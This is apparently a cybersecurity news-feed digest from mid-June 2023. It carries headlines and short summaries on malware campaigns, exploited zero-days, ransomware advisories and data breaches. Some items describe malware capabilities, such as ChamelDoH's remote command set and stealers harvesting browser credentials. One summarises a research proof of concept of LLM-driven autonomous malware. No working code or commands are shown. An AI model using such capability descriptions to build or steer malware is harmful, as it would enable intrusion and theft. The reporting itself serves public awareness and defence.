                2023-06-14 https://securityaffairs.com/147447/malware/llm-meets-malware.html

                Malware researchers analyzed the application of Large Language Models (LLM) to malware automation investigating future abuse in autonomous threats. Executive Summary In this report we shared some insight that emerged during our exploratory research, and proof of concept, on the application of Large Language Models to malware automation, investigating how a potential new kind of […]

                The post LLM meets Malware: Starting the Era of Autonomous Threat appeared first on Security Affairs.


                Autosummary: Researchers in the industry have just scratched the surface of this application, for instance with red teaming applications, as in the case of the PentestGPT project, but also, more recently, even with malware-related applications: Juniper researchers used ChatGPT to generate malicious code to demonstrate the speedup in malware writing, CyberArk's researchers tried to use ChatGPT to realize polymorphic malware, and Hays researchers created another polymorphic AI-powered malware in Python. About the author: B42 Labs researchers. Original post at https://medium.com/@b42labs/llm-meets-malware-starting-the-era-of-autonomous-threat-e8c5827ccc85. Technical Analysis: This is an uncommon threat research article; here the focus is not on a real-world threat actor, instead we deepen an approach that could likely be adopted in the near future by a whole new class of malicious actors, the AI-powered autonomous threat. Conclusion: When we look in the direction of LLMs and malware combined together, we clearly see a significant evolution in cybersecurity threats, potentially able to lead to a paradigm shift where malicious code operates based on predefined high-level intents. Luckily, the autonomous malware PoC we set up and the potential upcoming ones still have limitations: they rely on generic language models hosted online, which means internet connectivity is, and will be, a requirement for at least some time. As anticipated before, our Proof of Concept (PoC) autonomous malware is an AI-enabled PowerShell script, designed to illustrate the potential of artificial intelligence in automation and decision-making, with each phase of execution highlighting the adaptability and intelligence of the AI. Executive Summary: In this report we shared some insight that emerged during our exploratory research, and proof of concept, on the application of Large Language Models to malware automation, investigating what a potential new kind of autonomous threat would look like in the near future.


                Fake zero-day PoC exploits on GitHub push Windows, Linux malware

                exploits
                2023-06-14 https://www.bleepingcomputer.com/news/security/fake-zero-day-poc-exploits-on-github-push-windows-linux-malware/
                Hackers are impersonating cybersecurity researchers on Twitter and GitHub to publish fake proof-of-concept exploits for zero-day vulnerabilities that infect Windows and Linux with malware. [...]

                Autosummary: More recently, academics found thousands of repositories on GitHub offering fake proof-of-concept (PoC) exploits for various vulnerabilities, some of them infecting users with malware, malicious PowerShell, obfuscated info-stealer downloaders, Cobalt Strike droppers, and more.


                Switzerland under cyberattack

                ciber
                2023-06-14 https://www.helpnetsecurity.com/2023/06/14/swiss-government-ddos/

                Swiss government websites are under DDoS attacks, but several ransomware gangs have also turned their sights on Swiss government organizations, cantonal governments, cities and companies in the last few months. Government sites under DDoS attacks “Several Federal Administration websites are/were inaccessible on Monday 12 June 2023, due to a DDoS attack on its systems,” the Swiss National Cyber Security Centre (NCSC) said on Monday. “The Swiss government’s portal www.admin.ch remains accessible.” But the attackers did … More

                The post Switzerland under cyberattack appeared first on Help Net Security.


                Autosummary: According to Netzwoche, some 100 customers were affected by the outage, among them the municipality of Rüegsau, cinema chain Pathé, the industrial group Insys, the tool manufacturer PB Swiss Tools, the electrical engineering company Boess, and the Rugenbräu brewery. According to Swiss news outlet Le Temps, some of the Xplain data leaked by Play includes contracts, technical specifications, identifiers to access certain services, etc., from IT projects the company carried out with the Federal Office of Police (Fedpol) and several cantonal police forces.


                New Golang-based Skuld Malware Stealing Discord and Browser Data from Windows PCs

                exploits
                2023-06-14 https://thehackernews.com/2023/06/new-golang-based-skuld-malware-stealing.html
                A new Golang-based information stealer called Skuld has compromised Windows systems across Europe, Southeast Asia, and the U.S. "This new malware strain tries to steal sensitive information from its victims," Trellix researcher Ernesto Fernández Provecho said in a Tuesday analysis. "To accomplish this task, it searches for data stored in applications such as Discord and web browsers; information

                Autosummary: Besides gathering system metadata, the malware possesses capabilities to harvest cookies and credentials stored in web browsers as well as files present in the Windows user profile folders, including Desktop, Documents, Downloads, Pictures, Music, Videos, and OneDrive.


                Fake Researcher Profiles Spread Malware through GitHub Repositories as PoC Exploits

                exploits
                2023-06-14 https://thehackernews.com/2023/06/fake-researcher-profiles-spread-malware.html
                At least half a dozen GitHub accounts from fake researchers associated with a fraudulent cybersecurity company have been observed pushing malicious repositories on the code hosting service. All seven repositories, which are still available as of writing, claim to be a proof-of-concept (PoC) exploit for purported zero-day flaws in Discord, Google Chrome, and Microsoft Exchange. VulnCheck, which

                Autosummary: VulnCheck, which discovered the activity, said, "the individuals creating these repositories have put significant effort into making them look legitimate by creating a network of accounts and Twitter profiles, pretending to be part of a non-existent company called High Sierra Cyber Security."


                Unveiling the Balada injector: a malware epidemic in WordPress

                exploits
                2023-06-14 https://securityaffairs.com/147460/malware/balada-injector-malware-wordpress.html

                Learn the shocking truth behind the Balada Injector campaign and find out how to protect your organization from this relentless viral invasion. A deadly cyber campaign has been working silently to undermine website security by exploiting popular WordPress plugins — infiltrating over a million websites and leaving administrators scrambling for solutions. In April 2023, Bleeping […]

                The post Unveiling the Balada injector: a malware epidemic in WordPress appeared first on Security Affairs.


                Autosummary: Original post at https://cybernews.com/security/wordpress-malware-epidemic-balada-injector/. About the author: Adam Kohnke, Contributor at Cyber News. Some advice is self-evident, like ensuring web server hosts, website plugins, themes, or related software remain current and up to date. Primarily leveraging functions written in the Go language, ‘Balada’, which translates to ‘Ballad’ in several languages, achieves initial infection through commonly known but unpatched WordPress plugins, themes, or other software vulnerabilities.


                China-linked APT UNC3886 used VMware ESXi Zero-Day

                exploits
                2023-06-14 https://securityaffairs.com/147436/apt/unc3886-vmware-esxi-zero-day.html

                A China-linked APT group tracked as UNC3886 has been spotted exploiting a VMware ESXi zero-day vulnerability. Mandiant researchers observed a China-linked cyberespionage group, tracked as UNC3886, exploiting a VMware ESXi zero-day vulnerability tracked as CVE-2023-20867. “VMware Tools contains an Authentication Bypass vulnerability in the vgauth module.” reads the advisory published by VMware. “A fully compromised […]

                The post China-linked APT UNC3886 used VMware ESXi Zero-Day appeared first on Security Affairs.




                Chinese hackers use DNS-over-HTTPS for Linux malware communication

                exploits
                2023-06-14 https://www.bleepingcomputer.com/news/security/chinese-hackers-use-dns-over-https-for-linux-malware-communication/
                The Chinese threat group "ChamelGang" infects Linux devices with a previously unknown implant named "ChamelDoH," allowing DNS-over-HTTPS communications with attackers' servers. [...]

                Autosummary: Stairwell researchers found that ChamelDoH supports the following commands that its operators can issue remotely via the TXT records received in DNS-over-HTTPS requests: run – Execute a file/shell command; sleep – Set the number of seconds until the next check-in; wget – Download a file from a URL; upload – Read and upload a file; download – Download and write a file; rm – Delete a file; cp – Copy a file to a new location; cd – Change the working directory. Stairwell's analysis showed that ChamelDoH was first uploaded to VirusTotal in December 2022.


                CISA: LockBit ransomware extorted $91 million in 1,700 U.S. attacks

                exploits ransomware
                2023-06-14 https://www.bleepingcomputer.com/news/security/cisa-lockbit-ransomware-extorted-91-million-in-1-700-us-attacks/
                U.S. and international cybersecurity authorities said in a joint LockBit ransomware advisory that the gang successfully extorted roughly $91 million following approximately 1,700 attacks against U.S. organizations since 2020. [...]

                Autosummary: "Since January 2020, affiliates using LockBit have attacked organizations of varying sizes across an array of critical infrastructure sectors, including financial services, food and agriculture, education, energy, government and emergency services, healthcare, manufacturing, and transportation."


                Talking cybersecurity on “Learning Curve”

                ciber
                2023-06-14 https://grahamcluley.com/talking-cybersecurity-on-learning-curve/
                Earlier this year I was invited by Vodafone to appear on an episode of "Learning Curve", a series for founders, business leaders and - indeed - those who wish to be a business leader. You won't be surprised to hear that the topic I was being asked about was cybersecurity



                Quantum Origin Onboard strengthens device security against cyberattacks

                ciber
                2023-06-14 https://www.helpnetsecurity.com/2023/06/14/quantinuum-quantum-origin-onboard/

                Quantinuum launched Quantum Origin Onboard, an innovation in cryptographic key generation that provides quantum computing hardened cyber protection for a wide range of connected devices by maximizing the strength of keys generated within the devices themselves. The risk of cyberattacks compromising organizations continues to grow. As cybercriminals uncover new techniques to exploit connected systems and their data, even the cryptographic foundations of cybersecurity measures remain vulnerable to advanced threats. Cryptographic keys created using current typical … More

                The post Quantum Origin Onboard strengthens device security against cyberattacks appeared first on Help Net Security.


                Autosummary: “While quantum computing has the potential to render current encryption algorithms obsolete, posing a significant challenge to businesses and individuals alike, already today sophisticated attackers can take advantage of vulnerable encryption keys,” said Dr. Rajeeb Hazra, CEO of Quantinuum.


                Rezilion releases agentless runtime monitoring solution for vulnerability management

                exploits
                2023-06-14 https://www.helpnetsecurity.com/2023/06/14/rezilion-agentless-solution/

                Rezilion released an agentless solution, allowing user connection and access to Rezilion’s full feature functionality across multiple cloud platforms. It enables security teams to monitor exploitable attack surfaces at runtime without using an agent, simultaneously minimizing security and operational risk. Many reports and analyses confirm that organizations spend extraordinary time prioritizing and remediating software vulnerabilities. Research conducted by Ponemon Institute underscores that vulnerability management is time-consuming, costly, and often too overwhelming. Nearly half (47%) of … More

                The post Rezilion releases agentless runtime monitoring solution for vulnerability management appeared first on Help Net Security.


                Autosummary: While some organizations feel comfortable with agents, they represent an operational risk and overhead, leading Rezilion to release the first agentless solution that can see into the runtime execution of the software and determine not only which components are vulnerable but whether they are exploitable in the runtime context.


                Chinese Hackers Exploit VMware Zero-Day to Backdoor Windows and Linux Systems

                exploits
                2023-06-14 https://thehackernews.com/2023/06/chinese-hackers-exploit-vmware-zero-day.html
                The Chinese state-sponsored group known as UNC3886 has been found to exploit a zero-day flaw in VMware ESXi hosts to backdoor Windows and Linux systems. The VMware Tools authentication bypass vulnerability, tracked as CVE-2023-20867 (CVSS score: 3.9), "enabled the execution of privileged commands across Windows, Linux, and PhotonOS (vCenter) guest VMs without authentication of guest credentials



                Windows 11 KB5027231 update breaks Google Chrome for Malwarebytes users

                exploits
                2023-06-14 https://www.bleepingcomputer.com/news/microsoft/windows-11-kb5027231-update-breaks-google-chrome-for-malwarebytes-users/
                Malwarebytes confirmed today that the Windows 11 22H2 KB5027231 cumulative update released this Patch Tuesday breaks Google Chrome on its customers' systems. [...]

                Autosummary: "On June 13, 2023, Microsoft's KB5027231 update installed on Windows 11 caused a conflict between Google Chrome and exploit protection, resulting in browser crashes," Malwarebytes said.


                New ‘Shampoo’ Chromeloader malware pushed via fake warez sites

                exploits
                2023-06-14 https://www.bleepingcomputer.com/news/security/new-shampoo-chromeloader-malware-pushed-via-fake-warez-sites/
                A new ChromeLoader campaign is underway, infecting visitors of warez and pirated movie sites with a new variant of the search hijacker and adware browser extension named Shampoo. [...]

                Autosummary: ChromeLoader history: ChromeLoader is a browser hijacker that force-installs browser extensions that redirect search results to promote unwanted software, fake giveaways, surveys, adult games, dating sites, and other irrelevant results.


                Microsoft links data wiping attacks to new Russian GRU hacking group

                rusia-ucrania
                2023-06-14 https://www.bleepingcomputer.com/news/security/microsoft-links-data-wiping-attacks-to-new-russian-gru-hacking-group/
                Microsoft has linked a threat group it tracks as Cadet Blizzard since April 2023 to Russia's Main Directorate of the General Staff of the Armed Forces (also known as GRU). [...]



                WannaCry ransomware impersonator targets Russian "Enlisted" FPS players

                exploits ransomware rusia-ucrania
                2023-06-14 https://www.bleepingcomputer.com/news/security/wannacry-ransomware-impersonator-targets-russian-enlisted-fps-players/
                A ransomware operation targets Russian players of the Enlisted multiplayer first-person shooter, using a fake website to spread trojanized versions of the game. [...]

                Autosummary: Malicious website spreading Crypter ransomware (BleepingComputer). The installer downloaded from the fake website is "enlisted_beta-v1.0.3.115.exe," which drops two executable files on the user's disk if launched, namely "ENLIST~1" (the actual game) and "enlisted" (the Python ransomware launcher).


                Update Chrome now! Google fixes critical vulnerability in Autofill payments

                exploits
                2023-06-14 https://www.malwarebytes.com/blog/news/2023/06/update-chrome-now-google-fixes-critical-vulnerability-in-autofill-payments

                Categories: Exploits and vulnerabilities, News

                Tags: Google, Chrome, Autofill, payments critical, CVE-2023-3214

                Google has released an update which includes five security fixes, including a critical vulnerability in Autofill payments.

                The post Update Chrome now! Google fixes critical vulnerability in Autofill payments appeared first on Malwarebytes Labs.


                Autosummary: Chrome needs a relaunch to apply the update. After the update, your version should be 114.0.5735.133 for Mac and Linux, and 114.0.5735.133/134 for Windows, or later. How to protect yourself: If you’re a Chrome user on Windows, Mac, or Linux, you should update as soon as possible.


                Ticket scammers target Taylor Swift tour

                financial
                2023-06-14 https://www.malwarebytes.com/blog/news/2023/06/ticket-scammers-target-taylor-swift-tour

                Categories: Personal

                Tags: Taylor, swift, eras, music, gig, concert, tour, scam, ticket, reseller, fraud, fake

                We take a look at multiple reports of ticket reseller fraud aimed at fans of Taylor Swift's Eras tour.

                The post Ticket scammers target Taylor Swift tour appeared first on Malwarebytes Labs.


                Autosummary: Taylor Swift fans are being warned to be cautious when buying tickets for her current “Eras” tour, with scammers waiting in the wings to trick would-be gig goers. Reports of scammers taking advantage of Swift’s fans, called Swifties, indicate some have lost as much as $2,500 paying for tickets that don’t exist or that never arrive. His warning reads as follows: “Michigan residents who are defrauded by online ticket scammers should not just shake it off,” said Nessel.


                Critical FortiOS and FortiProxy Vulnerability Likely Exploited - Patch Now!

                exploits
                2023-06-13 https://thehackernews.com/2023/06/critical-fortios-and-fortiproxy.html
                Fortinet on Monday disclosed that a newly patched critical flaw impacting FortiOS and FortiProxy may have been "exploited in a limited number of cases" in attacks targeting government, manufacturing, and critical infrastructure sectors. The vulnerability, tracked as CVE-2023-27997 (CVSS score: 9.2), concerns a heap-based buffer overflow vulnerability in FortiOS and FortiProxy SSL-VPN that could



                UK communications regulator Ofcom hacked with a MOVEit file transfer zero-day

                exploits
                2023-06-13 https://securityaffairs.com/147396/data-breach/ofcom-hacked-moveit-zero-day.html

                UK communications regulator Ofcom suffered a data breach after a Clop ransomware attack exploiting the MOVEit file transfer zero-day. UK’s communications regulator Ofcom disclosed a data breach after a Clop ransomware attack. The threat actors exploited the zero-day flaw (CVE-2023-34362) in MOVEit file transfer and accessed the infrastructure of the regulator. A spokesperson for Ofcom […]

                The post UK communications regulator Ofcom hacked with a MOVEit file transfer zero-day appeared first on Security Affairs.




                Experts released PoC exploit for MOVEit Transfer CVE-2023-34362 flaw

                exploits
                2023-06-13 https://securityaffairs.com/147404/hacking/moveit-transfer-poc.html

                Security firm Horizon3 released proof-of-concept (PoC) exploit code for the remote code execution (RCE) flaw CVE-2023-34362 in the MOVEit Transfer MFT. MOVEit Transfer is a managed file transfer solution used by enterprises to securely transfer files using SFTP, SCP, and HTTP-based uploads. The vulnerability is a SQL injection flaw; it can be exploited by […]

                The post Experts released PoC exploit for MOVEit Transfer CVE-2023-34362 flaw appeared first on Security Affairs.




                PoC exploit for exploited MOVEit vulnerability released (CVE-2023-34362)

                exploits
                2023-06-13 https://www.helpnetsecurity.com/2023/06/13/cve-2023-34362-exploit/

                As more victim organizations of Cl0p gang’s MOVEit rampage continue popping up, security researchers have released a PoC exploit for CVE-2023-34362, the RCE vulnerability exploited by the Cl0p cyber extortion group to plunder confidential data. CVE-2023-34362 PoC exploit released Horizon3 security researchers have released proof-of-concept (PoC) exploit code for CVE-2023-34362, as well as technical root cause analysis of the flaw. Rapid7 has released an analysis of the vulnerability and a full exploit chain for CVE-2023-34362. … More

                The post PoC exploit for exploited MOVEit vulnerability released (CVE-2023-34362) appeared first on Help Net Security.


                Autosummary: “Firstly, this would harm their reputations among the wider public for engaging with Russian cybercriminals, while, secondly, the reality is this data is now in the hands of criminals, and whether a ransom is paid or not, there are never any guarantees it will be deleted.


                Two Russian Nationals Charged for Masterminding Mt. Gox Crypto Exchange Hack

                rusia-ucrania
                2023-06-13 https://thehackernews.com/2023/06/two-russian-nationals-charged-for.html
                The U.S. Department of Justice (DoJ) has charged two Russian nationals in connection with masterminding the 2014 digital heist of the now-defunct cryptocurrency exchange Mt. Gox. According to unsealed indictments released last week, Alexey Bilyuchenko, 43, and Aleksandr Verner, 29, have been accused of conspiring to launder approximately 647,000 bitcoins stolen from September 2011 through at

                Autosummary: The three-year sting operation, dubbed Trojan Shield, led to more than 800 arrests across 18 countries following an analysis of over 27 million messages that involved discussions on narcotics concealment methods, shipments of narcotics, money laundering, and even violent threats.


                Colombia plane crash: New video shows lost children found in Amazon

                latam
                2023-06-13 https://www.bbc.co.uk/news/world-latin-america-65889091?at_medium=RSS&at_campaign=KARANGA
                Footage shows rescuers tending to the children after they survived 40 days in the Amazon.


                Chinese hackers used VMware ESXi zero-day to backdoor VMs

                exploits
                2023-06-13 https://www.bleepingcomputer.com/news/security/chinese-hackers-used-vmware-esxi-zero-day-to-backdoor-vms/
                VMware patched today a VMware ESXi zero-day vulnerability exploited by a Chinese-sponsored hacking group to backdoor Windows and Linux virtual machines and steal data. [...]

                Autosummary: Figure: UNC3886 VMware zero-day attack (Mandiant). In March, Mandiant also revealed that the Chinese UNC3886 hackers abused a zero-day vulnerability (CVE-2022-41328) in the same mid-2022 campaign to compromise FortiGate firewall devices and deploy previously unknown Castletap and Thincrust backdoors.


                WordPress Stripe payment plugin bug leaks customer order details

                exploits
                2023-06-13 https://www.bleepingcomputer.com/news/security/wordpress-stripe-payment-plugin-bug-leaks-customer-order-details/
                The WooCommerce Stripe Gateway plugin for WordPress was found to be vulnerable to a bug that allows any unauthenticated user to view order details placed through the plugin. [...]


                Bulletproof hoster gets 3 years for pushing Urfsnif, Zeus malware

                exploits
                2023-06-13 https://www.bleepingcomputer.com/news/security/bulletproof-hoster-gets-3-years-for-pushing-urfsnif-zeus-malware/
                Romanian national Mihai Ionut Paunescu, aka "Virus," was sentenced to three years in prison by a Manhattan federal court for running a bulletproof hosting service and facilitating the distribution of the Gozi (Ursnif), Zeus, SpyEye, and BlackEnergy malware. [...]

                Autosummary: At various times from at least in or about May 2012 through in or about November 2012, PAUNESCU maintained a database which described certain servers that he controlled or leased as being used for "spyeye 100%SBL," "zeus 100%SBL," "100%sbl, phising [sic]," "100%SBL malware," and "fake av [antivirus] 100%SBL," reads the DoJ indictment obtained by BleepingComputer.


                Massive phishing campaign uses 6,000 sites to impersonate 100 brands

                financial
                2023-06-13 https://www.bleepingcomputer.com/news/security/massive-phishing-campaign-uses-6-000-sites-to-impersonate-100-brands/
                A widespread brand impersonation campaign targeting over a hundred popular apparel, footwear, and clothing brands has been underway since June 2022, tricking people into entering their account credentials and financial information on fake websites. [...]

                Autosummary: The brands impersonated by the phony sites include Nike, Puma, Asics, Vans, Adidas, Columbia, Superdry, Converse, Casio, Timberland, Salomon, Crocs, Sketchers, The North Face, UGG, Guess, Caterpillar, New Balance, Fila, Doc Martens, Reebok, Tommy Hilfiger, and others.


                Cynerio partners with Microsoft to ensure the security of medical and IoT devices

                industry
                2023-06-13 https://www.helpnetsecurity.com/2023/06/13/cynerio-microsoft/

                Cynerio collaborates with Microsoft to integrate with their cloud-native SIEM and SOAR offering Microsoft Sentinel. This collaboration aims to provide the healthcare industry with a comprehensive solution to address the growing security challenges posed by medical and IoT devices. As Leon Lerman, CEO of Cynerio, explains, “Medical and IoT devices are a black hole in the network that traditional IT security and inventory systems simply do not cover. As a result, customers are often left … More

                The post Cynerio partners with Microsoft to ensure the security of medical and IoT devices appeared first on Help Net Security.


                Dragos Partner Program helps users strengthen OT cybersecurity

                ciber
                2023-06-13 https://www.helpnetsecurity.com/2023/06/13/dragos-partner-program/

                Dragos launched the Dragos Global Partner Program, which brings together OT cybersecurity technology, services, and threat intelligence. The Dragos Partner Program extends even further by offering training that prepares partners as experts who can offer their customers assessment services based on Dragos’s proven assessment methodology; resell the Dragos Platform, including asset discovery, threat detection, and vulnerability management; and manage deployment for customers. The Dragos Partner Program enables channel partners to offer their customers the full range … More

                The post Dragos Partner Program helps users strengthen OT cybersecurity appeared first on Help Net Security.


                UK government must be more open on use of AI, say campaigners

                government
                2023-06-13 https://www.bbc.co.uk/news/uk-politics-65842385?at_medium=RSS&at_campaign=KARANGA
                Rishi Sunak wants to lead in shaping global rules - but is being urged to boost transparency at home.


                Microsoft June 2023 Patch Tuesday fixes 78 flaws, 38 RCE bugs

                exploits
                2023-06-13 https://www.bleepingcomputer.com/news/microsoft/microsoft-june-2023-patch-tuesday-fixes-78-flaws-38-rce-bugs/
                Today is Microsoft’s June 2023 Patch Tuesday, with security updates for 78 flaws, including 38 remote code execution vulnerabilities. [...]

                Autosummary: The number of bugs in each vulnerability category is listed below:
                • 17 Elevation of Privilege Vulnerabilities
                • 3 Security Feature Bypass Vulnerabilities
                • 32 Remote Code Execution Vulnerabilities
                • 5 Information Disclosure Vulnerabilities
                • 10 Denial of Service Vulnerabilities
                • 10 Spoofing Vulnerabilities
                • 1 Edge - Chromium Vulnerabilities
                This list does not include sixteen Microsoft Edge vulnerabilities previously fixed on June 2nd, 2023.


                Google grants $12 million to bolster NYC’s cybersecurity ecosystem

                ciber
                2023-06-13 https://www.helpnetsecurity.com/2023/06/13/google-cyber-research-program/

                Google has announced the Google Cyber NYC Institutional Research Program, allocating $12 million to stimulate the cybersecurity ecosystem and establish New York City as the global leader in cybersecurity. The $12 million will go towards research conducted at four of the city’s leading institutions of higher education. It will also be used to expand educational opportunities for students seeking advanced degrees in cybersecurity. As part of this commitment, The City University of New York, Columbia … More

                The post Google grants $12 million to bolster NYC’s cybersecurity ecosystem appeared first on Help Net Security.

                Autosummary: “We believe NYC will be the epicenter for next-generation research, students, and startups in cyber, trust, and safety, and we applaud Google for its leadership and unwavering support for Cornell University,” Morrisett added.


                St. Margaret’s Health is the first hospital to cite a cyberattack as a reason for its closure

                ciber
                2023-06-13 https://securityaffairs.com/147430/cyber-crime/st-margarets-health-closes-cyberattack.html

                St. Margaret’s Health in Illinois is partly closing operations at its hospitals due to a 2021 ransomware attack that impacted its payment system. In February 2021, a ransomware attack hit St. Margaret’s Health in Illinois and forced the organization to shut down IT infrastructure at the Spring Valley hospital to contain the threat. The cyber […]

                The post St. Margaret’s Health is the first hospital to cite a cyberattack as a reason for its closure appeared first on Security Affairs.

                Autosummary: Pierluigi Paganini (SecurityAffairs – hacking, hospital)


                Pirated Windows 10 ISOs install clipper malware via EFI partitions

                exploits
                2023-06-13 https://www.bleepingcomputer.com/news/security/pirated-windows-10-isos-install-clipper-malware-via-efi-partitions/
                Hackers are distributing Windows 10 using torrents that hide cryptocurrency hijackers in the EFI (Extensible Firmware Interface) partition to evade detection. [...]

                Autosummary: These addresses were extracted from the following Windows ISOs shared on torrent sites, but Dr. Web warns that there could be more out there:
                • Windows 10 Pro 22H2 19045.2728 + Office 2021 x64 by BoJlIIIebnik RU.iso
                • Windows 10 Pro 22H2 19045.2846 + Office 2021 x64 by BoJlIIIebnik RU.iso
                • Windows 10 Pro 22H2 19045.2846 x64 by BoJlIIIebnik RU.iso
                • Windows 10 Pro 22H2 19045.2913 + Office 2021 x64 by BoJlIIIebnik [RU, EN].iso
                • Windows 10 Pro 22H2 19045.2913 x64 by BoJlIIIebnik [RU, EN].iso
                Pirated OS downloads should be avoided because they can be dangerous, as those who create the unofficial builds can easily hide persistent malware.


                Colombia plane crash: Mum told children to leave her and get help

                latam
                2023-06-12 https://www.bbc.co.uk/news/world-latin-america-65874377?at_medium=RSS&at_campaign=KARANGA
                The children’s mother survived for four days after the plane crashed in the jungle.


                Xplain data breach also impacted the national Swiss railway FSS

                financial
                2023-06-12 https://securityaffairs.com/147346/malware/national-railway-fss-xplain.html

                The Play ransomware attack suffered by the IT services provider Xplain also impacted the national railway company of Switzerland (FSS) and the canton of Aargau. The Play ransomware attack suffered by the IT services provider Xplain is worse than initially estimated, the incident also impacted the national railway company of Switzerland (FSS) and the canton […]

                The post Xplain data breach also impacted the national Swiss railway FSS appeared first on Security Affairs.

                Autosummary: Pierluigi Paganini (SecurityAffairs – hacking, xPlay)


                Cybercriminals Using Powerful BatCloak Engine to Make Malware Fully Undetectable

                exploits ciber
                2023-06-12 https://thehackernews.com/2023/06/cybercriminals-using-powerful-batcloak.html
                A fully undetectable (FUD) malware obfuscation engine named BatCloak is being used to deploy various malware strains since September 2022, while persistently evading antivirus detection. The samples grant "threat actors the ability to load numerous malware families and exploits with ease through highly obfuscated batch files," Trend Micro researchers said. About 79.6% of the total 784 artifacts

                Autosummary: What’s more, ScrubCrypt is designed to be interoperable with various well-known malware families like Amadey, AsyncRAT, DarkCrystal RAT, Pure Miner, Quasar RAT, RedLine Stealer, Remcos RAT, SmokeLoader, VenomRAT, and Warzone RAT.


                Exploit released for MOVEit RCE bug used in data theft attacks

                exploits
                2023-06-12 https://www.bleepingcomputer.com/news/security/exploit-released-for-moveit-rce-bug-used-in-data-theft-attacks/
                Horizon3 security researchers have released proof-of-concept (PoC) exploit code for a remote code execution (RCE) bug in the MOVEit Transfer managed file transfer (MFT) solution abused by the Clop ransomware gang in data theft attacks. [...]

                Autosummary: The list of organizations that have disclosed data breaches following these attacks includes, among others, the EY British multinational, the Irish Health Service Executive (HSE) public healthcare system, UK-based provider of payroll and HR solutions Zellis and some of its customers (i.e., UK’s flag carrier British Airways, Irish flag carrier Aer Lingus, and the Minnesota Department of Education).


                Swiss government warns of ongoing DDoS attacks, data leak

                government
                2023-06-12 https://www.bleepingcomputer.com/news/security/swiss-government-warns-of-ongoing-ddos-attacks-data-leak/
                The Swiss government has disclosed that a recent ransomware attack on an IT supplier might have impacted its data, while today, it warns that it is now targeted in DDoS attacks. [...]


                Researchers Uncover Publisher Spoofing Bug in Microsoft Visual Studio Installer

                exploits
                2023-06-12 https://thehackernews.com/2023/06/researchers-uncover-publisher-spoofing.html
                Security researchers have warned about an "easily exploitable" flaw in the Microsoft Visual Studio installer that could be abused by a malicious actor to impersonate a legitimate publisher and distribute malicious extensions. "A threat actor could impersonate a popular publisher and issue a malicious extension to compromise a targeted system," Varonis researcher Dolev Taler said. "Malicious


                FUD Malware obfuscation engine BatCloak continues to evolve

                exploits ransomware
                2023-06-12 https://securityaffairs.com/147371/malware/fud-malware-obfuscation-engine-batcloak.html

                Researchers detailed a fully undetectable (FUD) malware obfuscation engine named BatCloak that is used by threat actors. Researchers from Trend Micro have analyzed the BatCloak, a fully undetectable (FUD) malware obfuscation engine used by threat actors to stealthily deliver their malware since September 2022. The samples analyzed by the experts demonstrated a remarkable ability to persistently evade […]

                The post FUD Malware obfuscation engine BatCloak continues to evolve appeared first on Security Affairs.

                Autosummary: ScrubCrypt is designed to include testing on a host of popular pieces of malware such as Amadey, AsyncRAT, DarkCrystal RAT, Pure Miner, Quasar RAT, RedLine Stealer, Remcos RAT, SmokeLoader, VenomRAT, and Warzone RAT (aka Ave Maria).


                Have I Been Pwned warns of new Zacks data breach impacting 8 million

                financial
                2023-06-12 https://www.bleepingcomputer.com/news/security/have-i-been-pwned-warns-of-new-zacks-data-breach-impacting-8-million/
                Zacks Investment Research (Zacks) has reportedly suffered an older, previously undisclosed data breach impacting 8.8 million customers, with the database now shared on a hacking forum. [...]

                Autosummary: Hunt told BleepingComputer that the database contains Zacks customers’ email addresses, usernames, unsalted SHA256 passwords, addresses, phone numbers, first and last names, and other data.


                Surprise! Staff don’t like receiving phishing tests from their firms that pose as salary increases

                financial
                2023-06-12 https://grahamcluley.com/staff-salary-phishing-test-backfire/
                UK law firm Knights certainly has an interesting way of keeping its staff happy.

                Autosummary: After disappointing its staff in a recent round of pay reviews that either granted zero rises or “tiny percentages on already way-below-market rates”, workers were delighted to receive an email entitled “Important notice: Salary increase.”


                Intellihartx data breach exposed the personal and health info of 490,000 individuals

                financial
                2023-06-12 https://securityaffairs.com/147380/data-breach/intellihartx-data-breach.html

                Intellihartx is notifying about 490,000 individuals that their personal information was compromised in the GoAnywhere zero-day attack in January. The Clop ransomware group stole personal and health information of 489,830 individuals as a result of a ransomware attack on the technology firm Intellihartx. The attack took place earlier this year, the attackers have […]

                The post Intellihartx data breach exposed the personal and health info of 490,000 individuals appeared first on Security Affairs.

                Autosummary: The Cl0p cybergang has also claimed responsibility for the recent MOVEit Transfer MFT zero-day attack, which impacted several major organizations, including Irish airline Aer Lingus, British Airways, the BBC, UK-based payroll and HR company Zellis, and the Canadian province of Nova Scotia.


                Fortinet: New FortiOS RCE bug "may have been exploited" in attacks

                exploits
                2023-06-12 https://www.bleepingcomputer.com/news/security/fortinet-new-fortios-rce-bug-may-have-been-exploited-in-attacks/
                Fortinet says a critical FortiOS SSL VPN vulnerability that was patched last week "may have been exploited" in attacks impacting government, manufacturing, and critical infrastructure organizations. [...]

                Autosummary: "At this time we are not linking FG-IR-23-097 to the Volt Typhoon campaign, however Fortinet expects all threat actors, including those behind the Volt Typhoon campaign, to continue to exploit unpatched vulnerabilities in widely used software and devices," the company said.


                Strava heatmap loophole may reveal users’ home addresses

                financial
                2023-06-12 https://www.malwarebytes.com/blog/news/2023/06/strava-heatmap-loophole-may-reveal-users-home-addresses

                Anonymous data on fitness app Strava’s heatmap may be able to be used to pinpoint users.

                The post Strava heatmap loophole may reveal users’ home addresses appeared first on Malwarebytes Labs.

                Autosummary: Strava, used by more than 100 million people, includes features you’d commonly see in this kind of product like heart rate, GPS data, and so on. This, combined with public profiles displaying real names, photographs, and data related to specific activities means that singling out certain users was achievable.


                Understanding Ransomware Threat Actors: LockBit

                exploits ransomware
                2023-06-12 https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-165a

                SUMMARY

                In 2022, LockBit was the most deployed ransomware variant across the world and continues to be prolific in 2023. Since January 2020, affiliates using LockBit have attacked organizations of varying sizes across an array of critical infrastructure sectors, including financial services, food and agriculture, education, energy, government and emergency services, healthcare, manufacturing, and transportation. LockBit ransomware operation functions as a Ransomware-as-a-Service (RaaS) model where affiliates are recruited to conduct ransomware attacks using LockBit ransomware tools and infrastructure. Due to the large number of unconnected affiliates in the operation, LockBit ransomware attacks vary significantly in observed tactics, techniques, and procedures (TTPs). This variance in observed ransomware TTPs presents a notable challenge for organizations working to maintain network security and protect against a ransomware threat.

